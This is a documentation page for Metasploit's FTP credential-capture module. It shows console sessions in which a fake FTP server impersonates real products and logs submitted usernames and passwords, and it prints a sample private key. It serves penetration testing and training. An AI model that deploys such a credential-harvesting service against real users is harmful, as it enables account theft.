Authentication Capture: FTP - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/ftp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: FTP
Module: auxiliary/server/capture/ftp
Source code: modules/auxiliary/server/capture/ftp.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a fake FTP service that is designed to capture authentication credentials.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/ftp
msf auxiliary(ftp) > show targets
... a list of targets ...
msf auxiliary(ftp) > set TARGET target-id
msf auxiliary(ftp) > show options
... show and set options ...
msf auxiliary(ftp) > exploit
Knowledge Base
This module creates a mock FTP server which accepts credentials before throwing a 500
error.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/server/capture/ftp
- Do:
run
Options
BANNER
The Banner which should be displayed (200 server message). Default is FTP Server Ready
.
Some notable banners to emulate:
Microsoft FTP Service
ucftpd FTP server ready.
Serv-U FTP Server v6.4 for WinSock ready...
Serv-U FTP Server v15.0 ready...
ProFTPD 1.3.4a Server (FTP-Server)
SSL
Boolean if SSL should be used, making this FTPS. FTPS is typically run on port 990. If SSLCert
is not set, a certificate
will be automatically generated. Default is False
.
SSLCert
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically generated. Default is ``.
Scenarios
FTP Emulating Microsoft with Telnet Client
Server:
msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service"
banner => Microsoft FTP Service
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:21
[*] Server started.
[+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9
Client:
root@kali:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Microsoft FTP Service
USER root
331 User name okay, need password...
PASS SuperSecret9
500 Error
FTPS with Self-Signed Certificate and curl/lftp Client
Server:
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
.................................+++++
........+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem
msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDMboMCNpx4nk16
vx/4gPn7yzMDHh/iTm27gIQKlktxNNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADx
j/S9P6f62/GfcKsSeuN7VZ+anRyrdcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT
7sgVo8TYRkIIziEXarihk0w1eMKUVlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwh
qKFaWXSE3IjYwbVJs03dF2jBVQCVXBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxU
unt5t3/NXJbeTNcHrcvY2CQK4kDhu37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCX
wKsFlR53AgMBAAECggEAA0jfSADSoMmCWy+I9vgzjA0mw60PPBaggru842Ko0afU
nqxntZfwDXn0vnoM3PFUrYA9uCszHQRqr3btqsDEFS7FghdQWFqrHwcwKk7N8B9T
XzXEA9knQVLZEF2hPKGg3wFWO9x+NwBrhse2ZUqdVhBC7VtKgtLPJqF0PwOytKlq
/pYniZdkLPrGHcQ13f50vr/dlkIGQ4YaKcAFTjCOxnK7q4of+sa75hFsXVwtnz9j
nw2SEs+SHEfLUl8wPww3IvwCkqFaosagIey2NyTtHxR3lqHobaOmu1nqXkNu/oXk
bt67M3D8VOrKu2aR9sMbirnpjSj+aBSaIjso6kSCaQKBgQD+VdrjMJu3Cr4LSoZL
FV7cog0HBlp3KE910rtY+VHH6c7jo4ow5vVvfITt78/Ntrkj1jAamAV2xA9okMay
7BlL3MVx/MKeQTwEWjTWIed/7Xc5D8o/PqMC8WkIc0Uur3BprwkGTL+wBqo9PHSO
eGo3zcdpbRrL0616o/7+uWIL1QKBgQDNxQq6tBlCY9ckuoof9SmayCmcU4t4Wusx
UJWBN32X8IGVGJRCxMlfwzLUlJwOTIWSkCj6Dw8/njsehda3KgqXbzfemIqD9K+j
/EL/ktrgBmh8ajnjBJX/2O7PsmeF7gFuDjVWflcG6WpuKFapkTsbU4D6ITmLi4uH
0Ot0CMDjGwKBgQCpQrv0XKIUs/p8CzHKgENsdBBVb33/NP2EvSTfdrVdZRXB21GZ
b+tBMc5Jh0J1djhKSD4lRKzGOH7EqS0DYCsJmLhyPrPKnEFz6BCnvVKSiZfBiuef
JXFZAQ5UiFovUqRuQQWxgpxDanwbWsN7GVofHzypxemCYrJeHwwRu5ArrQKBgDpz
FjEip2osYhiUxFd/lGnbIba+JIfzi4tekJk74fke4DAx4yt0Kp+BGxc3f3ywT+Dq
AjnFvVcc4z4wVmWBE7EgboZUXkRNZPb32TAvzuyD5Xox0m+iBdm/DVcCHlX03YMd
lhkTmjTkaM8RtkxEbL2+Yoyqk2YIJYJW3gr/0YqxAoGAe95gaeyjz5IvA/Spfztt
t8Sw0PSNKhw7Th4UwYW1g38Yh/oedHjI/cwV2oegoGRe15nQGQ3IYhyB7yTtsRJI
lVcthX4E1hPRsB3DiuldwWSxJcFhlhm72p/nas/ZsIkE4mKWccj6hJFUlnGhQh+y
dUubf5UfmaGETVVd8MbMNvQ=
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUDSznPwoelB25d/7v7bk+mjkDb0kwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDUwMjAxMDVaFw0xOTEx
MDUwMjAxMDVaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDMboMCNpx4nk16vx/4gPn7yzMDHh/iTm27gIQKlktx
NNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADxj/S9P6f62/GfcKsSeuN7VZ+anRyr
dcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT7sgVo8TYRkIIziEXarihk0w1eMKU
VlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwhqKFaWXSE3IjYwbVJs03dF2jBVQCV
XBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxUunt5t3/NXJbeTNcHrcvY2CQK4kDh
u37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCXwKsFlR53AgMBAAGjUzBRMB0GA1Ud
DgQWBBQzY/telaztoKPEd1vfKqXQ1khMWTAfBgNVHSMEGDAWgBQzY/telaztoKPE
d1vfKqXQ1khMWTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAT
ch32xF4s6X4YTg00zbhztiBGxjDDSp6ULk68E6GuxSDcB+wE/nL66urdZJTvlFZk
M26to4odpNhCnYiKIJr4eGvk/8H83yHJn4yr1O2Xy0MJ3piGt4gJm6cA9/DdOzlE
U3tE8X+lcbq4fiz8pkUOU219jiw63OCfB7N1iGMdqCkpLWbGYXH71SAWqzpPFMsA
0oBDYjN1rMBSVA5sFteZNNkidHRE7OaXCAQ20htLZe0cO1rWMO44JKEKalwJW4YZ
n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb
mVuIIRbrDW/sOgu2Viis
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set srvport 990
srvport => 990
msf5 auxiliary(server/capture/ftp) > set ssl true
ssl => true
msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:990
[*] Server started.
[+] FTP LOGIN 127.0.0.1:33618 admin / password123
[+] FTP LOGIN 127.0.0.1:33758 admin / password4321
Clients:
root@kali:~# curl -k --ftp-ssl --user admin:password123 ftps://127.0.0.1:990
curl: (67) Access denied: 500
root@kali:~# lftp ftps://admin:[email protected]:990 -e "set ssl:verify-certificate no; dir;"
ls: Login failed: 500 Error
Go back to menu.
Msfconsole Usage
Here is how the server/capture/ftp auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/ftp
msf6 auxiliary(server/capture/ftp) > show info
Name: Authentication Capture: FTP
Module: auxiliary/server/capture/ftp
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
ddz <[email protected]>
hdm <[email protected]>
Available actions:
Name Description
---- -----------
Capture Run FTP capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BANNER FTP Server Ready yes The server banner
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 21 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Description:
This module provides a fake FTP service that is designed to capture
authentication credentials.
Module Options
This is a complete list of options available in the server/capture/ftp auxiliary module:
msf6 auxiliary(server/capture/ftp) > show options
Module options (auxiliary/server/capture/ftp):
Name Current Setting Required Description
---- --------------- -------- -----------
BANNER FTP Server Ready yes The server banner
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 21 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture Run FTP capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/ftp auxiliary module:
msf6 auxiliary(server/capture/ftp) > show advanced
Module advanced options (auxiliary/server/capture/ftp):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/ftp module can do:
msf6 auxiliary(server/capture/ftp) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run FTP capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/ftp auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/ftp) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
500 Errorrn
Here is a relevant code snippet related to the "500 Errorrn" error message:
105:
106: print_good("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
107: end
108:
109: @state[c][:pass] = data.strip
110: c.put "500 Error\r\n"
111: return
112:
113: end
114:
115: def on_client_close(c)
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10919 Merged Pull Request: capture/ftp docs and banner
- #9897 Merged Pull Request: Fix #8404 ListenerComm Support For Exploit::Remote::TcpServer
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5768 Merged Pull Request: Update modules to use metasploit-credential instead of report_auth_info
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/server/capture/drda
- auxiliary/server/capture/http
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/mssql
- auxiliary/server/capture/mysql
- auxiliary/server/capture/pop3
- auxiliary/server/capture/postgresql
- auxiliary/server/capture/printjob_capture
- auxiliary/server/capture/sip
- auxiliary/server/capture/smb
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
- auxiliary/server/capture/vnc
- auxiliary/fuzzers/ftp/ftp_pre_post
- auxiliary/scanner/ftp/ftp_login
- auxiliary/scanner/ftp/ftp_version
- exploit/mainframe/ftp/ftp_jcl_creds
- auxiliary/server/ftp
- auxiliary/server/tftp
- auxiliary/fuzzers/ftp/client_ftp
- auxiliary/scanner/ftp/easy_file_sharing_ftp
- post/android/capture/screen
- post/osx/capture/keylog_recorder
- post/osx/capture/screen
- post/windows/capture/keylog_recorder
- post/windows/capture/lockout_keylogger
- auxiliary/scanner/dlsw/dlsw_leak_capture
- exploit/windows/browser/ie_setmousecapture_uaf
Authors
- ddz
- hdm
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.